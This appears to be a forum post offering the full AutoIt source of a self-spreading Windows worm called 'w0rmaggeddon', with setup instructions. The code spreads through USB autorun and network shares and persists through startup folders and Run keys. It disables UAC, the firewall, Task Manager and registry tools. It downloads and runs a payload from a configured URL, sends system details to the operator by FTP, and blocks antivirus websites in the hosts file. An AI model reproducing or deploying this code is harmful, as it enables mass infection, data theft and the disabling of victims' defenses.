13 Years of Service
24%
w0rmaggeddon 1.0
Features:
Features:
Code:
>
;w0rmaggeddon - Jordan Goodby Programming v1
; By using this code you agree to use this for EDUCATIONAL purposes only i am not liable for any damage caused by this code
; You may modify and freely distrubute this code providing you credit me "Jordan Goodby - [email protected]"
; You Receivce no support with this code so please do not ask
;_____________Instructions __________________
; Edit $url and input your .exe file (Direct Link)
; Edit $Save And input the local file name including extension e.g. Updates.exe
; Edit $ftpadd with your ftp server address
; Edit $ftpuse with your ftp username
; Edit $ftppas with your ftp Password
; Compile The code to an Exe
; Use for educational Reasons
;Logs are Sent Via FTP to the Input Details
#RequireAdmin
#NoTrayIcon
#include
#include
#include
#include
Global $ip, $url, $save
$url = ""
$save = ""
if _Singleton("Virus",1) = 0 Then
Exit
EndIf
copy()
autorun()
reg()
share()
dl()
data()
redirect()
func copy()
FileCopy(@ScriptFullPath,@StartupDir,1)
filecopy(@ScriptFullPath,@StartupCommonDir,1)
FileCopy(@ScriptFullPath, "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\", 1)
FileCopy(@ScriptFullPath,@AppDataDir,1)
EndFunc
func autorun()
$var = DriveGetDrive( "Removable" )
If NOT @error Then
For $i = 1 to $var[0]
filecopy(@ScriptFullPath,$var[$i],1)
FileWriteLine($var[$i] & "\autorun.inf","[autorun]" & @crlf & "Action=Open folder to view files" & @crlf & "Icon=%systemroot%\system32\shell32.dll,4" & @crlf & "Shellexecute=" & @scriptname)
Next
EndIf
EndFunc
func reg()
RegWrite("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Updater", "REG_SZ", @ScriptFullPath)
RegWrite("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "Windows Updater", "REG_SZ", "C:\" & @ScriptName)
RegWrite("HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\", "EnableLUA", "REG_DWORD", 0)
RegWrite("HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\", "EnableFirewall", "REG_DWORD", 0)
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 1)
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced", "Hidden", "REG_DWORD", 2)
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 1)
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 1)
RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableChangePassword", "REG_DWORD", 1)
RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "LockTaskbar", "REG_DWORD", 1)
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile","EnableFirewall","REG_DWORD",0)
regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NoSaveSettings","REG_DWORD",1)
EndFunc
func share()
DirCreate("C:\Shared")
FileCopy(@ScriptFullPath,"C:\Shared\",1)
_Net_Share_ShareAdd(@IPAddress1,"Shared Files",$STYPE_DISKTREE,"C:\Shared")
FileSetAttrib(@ScriptName,"+SH")
EndFunc
func dl()
InetGet($url,$save,1,0)
ShellExecute($save)
EndFunc
func data()
$ip = _GetIP()
Gather()
ftpup()
EndFunc
func gather()
if FileExists(@startupdir & "\" & @scriptname) Then
$startup = "YES"
Else
$startup = "NO"
EndIf
FileWrite("conf.ini","Computer Name: " & @ComputerName & @crlf & "Username: " & @username & @crlf & "IP Address: " & $ip & @crlf & "Execution Time: " & @mday & "/" & @mon & "/" & @year & " @ " & @hour & ":" & @min & @crlf & "Os Version: " & @OSVersion & @CRLF & "Startup Check: " & $startup )
EndFunc
func ftpup()
$ftpadd = ""
$ftpuse = ""
$ftppas = ""
$sesh = _FTP_Open("Logs")
$conn = _FTP_Connect($sesh,$ftpadd,$ftpuse,$ftppas)
_ftp_fileput($conn,"conf.ini",@ComputerName & @mday & @mon & @YEAR & " " & @hour & ":" & @min & ".inf")
EndFunc
func redirect()
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 virustotal.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 virusscan.jotti.org")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 anubis.iseclab.org")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 threatexpert.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 clamwin.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 avira.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 avg.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 comodo.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 mcafee.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 safer-networking.org")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.virustotal.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.virusscan.jotti.org")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.anubis.iseclab.org")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.threatexpert.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.clamwin.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.avira.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.avg.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.comodo.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.mcafee.com")
FileWriteLine("C:\WINDOWS\SYSTEM32\DRIVERS\ETC\hosts","127.0.0.1 www.safer-networking.org")
EndFunc